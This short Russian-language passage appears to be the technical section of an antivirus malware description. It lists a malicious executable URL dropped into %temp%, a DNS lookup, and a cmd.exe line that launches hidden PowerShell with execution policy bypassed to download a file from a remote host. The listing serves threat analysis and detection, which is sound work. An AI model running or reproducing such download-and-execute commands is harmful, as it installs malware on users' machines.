Техническая информация
- http://w25k8hbe04sq.pw/blog/w2eezcfue85y.exe как %temp%\rutledge.exe
- '<SYSTEM32>\cmd.exe' /c cd DarroomfulinconsolabledesiccantepilepticgranddaughterDanerep & PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('h...
- DNS ASK w2###hbe04sq.pw
- '<SYSTEM32>\cmd.exe' /c cd DarroomfulinconsolabledesiccantepilepticgranddaughterDanerep & PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('h...' (со скрытым окном)